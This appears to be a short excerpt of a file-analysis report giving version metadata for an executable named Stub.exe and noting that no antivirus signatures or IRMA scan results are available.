OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
No antivirus signatures available.
No IRMA results available.